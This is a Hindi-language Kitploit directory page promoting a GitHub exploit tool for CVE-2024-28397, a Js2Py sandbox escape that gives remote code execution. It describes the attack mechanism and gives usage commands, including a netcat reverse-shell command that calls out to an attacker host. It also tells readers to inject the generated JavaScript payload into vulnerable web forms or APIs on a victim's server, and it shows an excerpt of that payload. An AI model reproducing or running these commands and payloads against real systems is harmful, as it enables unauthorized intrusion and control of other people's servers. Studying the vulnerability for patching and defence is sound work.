Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-28397-Js2Py-RCE-Exploit — CVE-2024-28397 के लिए पेशेवर एक्सप्लॉइट: Js2Py सैंडबॉक्स एस्केप जो रिमोट कोड निष्पादन (RCE) की ओर ले जाता है। मॉड्यूलर पेलोड जनरेशन शामिल है। | Kitploit
उपकरण/GitHubGitHub/xeloxa/cve-2024-28397-js2py-rce-exploit
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubxeloxa/cve-2024-28397-js2py-rce-exploit

CVE-2024-28397-Js2Py-RCE-Exploit

CVE-2024-28397 के लिए पेशेवर एक्सप्लॉइट: Js2Py सैंडबॉक्स एस्केप जो रिमोट कोड निष्पादन (RCE) की ओर ले जाता है। मॉड्यूलर पेलोड जनरेशन शामिल है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
रिपॉजिटरी देखेंवेबसाइट
2127 महीने पहलेअभी तक समीक्षित नहीं
साझा करें

तकनीकी ब्रीफिंग पूर्वावलोकन

💡 गहन अध्ययन: पूर्ण तकनीकी ब्रीफिंग (PDF) पढ़ने के लिए यहाँ क्लिक करें।

CVE-2024-28397: Js2Py सैंडबॉक्स एस्केप पेलोड जनरेटर

Python License CVE

CVE-2024-28397 के लिए एक पेशेवर पेलोड जनरेटर। यह टूल दुर्भावनापूर्ण JavaScript कोड उत्पन्न करता है जो js2py सैंडबॉक्स (संस्करण <= 0.74) से बाहर निकलकर लक्षित सिस्टम पर मनमाने कमांड निष्पादित करने के लिए डिज़ाइन किया गया है।

🚨 भेद्यता विवरण

  • CVE ID: CVE-2024-28397
  • प्रभावित घटक: Js2Py <= 0.74
  • प्रभाव: रिमोट कोड निष्पादन (RCE) / सैंडबॉक्स एस्केप
  • तंत्र: JavaScript वातावरण के भीतर से Python की subprocess.Popen क्लास तक पहुँचने के लिए Object.getOwnPropertyNames का शोषण करता है।
  • 🚀 उपयोग

    यह स्क्रिप्ट भेद्यता का शोषण करने के लिए आवश्यक सटीक JavaScript पेलोड उत्पन्न करती है। इस टूल का उपयोग करने के लिए आपको js2py स्थापित करने की आवश्यकता नहीं है।

    1. पेलोड उत्पन्न करें

    पीड़ित मशीन पर निष्पादित किए जाने वाले कमांड के साथ स्क्रिप्ट चलाएँ।

    root@kitploit:~
    # Generate payload to run 'id'
    python3 exploit.py -c "id"
    
    root@kitploit:~
    # Generate payload for a Reverse Shell
    python3 exploit.py -c "nc -e /bin/bash 10.10.10.10 4444"
    

    2. लक्ष्य पर हमला करें

    टूल द्वारा उत्पन्न आउटपुट को कॉपी करें और इसे असुरक्षित एप्लिकेशन (जैसे, एक वेब फॉर्म, API एंडपॉइंट, या कॉन्फ़िगरेशन फ़ाइल जिसे js2py द्वारा पार्स किया जाता है) में इंजेक्ट करें।

    इंजेक्शन उदाहरण:

    यदि कोई वेबसाइट उपयोगकर्ता इनपुट लेती है और उसे js2py.eval_js(user_input) के साथ चलाती है, तो उत्पन्न कोड को पेस्ट करने से आपका कमांड उनके सर्वर पर निष्पादित हो जाएगा।

    📝 उदाहरण

    root@kitploit:~
    $ python3 exploit.py -c "whoami"
    
        var output = "Initial";
        try {
            var leaked_wrapper = Object.getOwnPropertyNames({});
            // ... (full malicious code) ...
            var res = Popen("whoami", ...).communicate();
            output = res;
        } ...
        output
    

    👨‍💻 लेखक

    अली सुनबुल (xeloxa)

    • 📧 ईमेल: [email protected]
    • 🌐 वेबसाइट: xeloxa.netlify.app
    • 🐙 GitHub: @xeloxa

    ⚠️ अस्वीकरण

    यह सॉफ्टवेयर केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए प्रदान किया गया है। लेखक इस कोड के किसी भी दुरुपयोग के लिए कोई ज़िम्मेदारी स्वीकार नहीं करता है। किसी भी ऐसे सिस्टम पर परीक्षण करने से पहले जिसके स्वामी आप नहीं हैं, सुनिश्चित करें कि आपके पास स्पष्ट अनुमति है।

    टूल डाउनलोड करें